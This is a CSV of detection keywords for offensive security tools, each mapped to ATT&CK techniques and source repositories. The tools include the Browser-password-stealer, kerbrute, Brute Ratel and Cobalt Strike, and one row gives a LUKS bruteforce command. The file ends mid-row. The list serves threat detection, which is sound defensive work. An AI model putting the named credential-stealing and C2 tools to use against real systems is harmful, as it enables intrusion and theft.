+"*brew install sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z"
+"*bropper.py *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z"
+"*Bropper-main.zip*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z"
+"*browser.keylog_file.write*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z"
+"*browser_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*browser_autopwn*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*browser_autopwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*browser_autopwn2_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*browser_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*browser_exploit_server_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*BrowserBookmarkDiscovery_BrowserHistory.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*Browser-C2.git*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z"
+"*Browser-C2-master.zip*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z"
+"*browserexploitserver.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*BrowserGhost-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*BrowserListener.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*Browser-password-stealer.git*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*Browser-password-stealer-master*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*browserpivot *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*brun_script_in_mem*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"*brunasadmin*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Brute/Brute.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*Brute/Brute.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*brute_force_ntlm.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*bruteforce *.txt*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Brute-force Unsuccessful!*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*bruteforce.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*BruteForce.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*BruteforceCLSIDs.*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*bruteForceCombos*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Brute-force-Instagram-*.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - 
Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*bruteforce-luks -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteloader*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - 
T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*brute-locadmin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*brute-ratel-*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BruteRatel*.tar.gz*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
+"*BruteRatel*.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bruteratel.com/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bruteratel/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Brute-Ratel-C4*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Brutesploit.git*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*BruteSploit/wlist/*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*brutespray*","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","1772","378","2023-03-15T23:00:29Z","2017-04-05T17:05:10Z" +"*BruteStager.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*BruteStager.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*bruteuser.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteuserCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*BruteX*","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. 
Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","1714","562","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" +"*bshinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 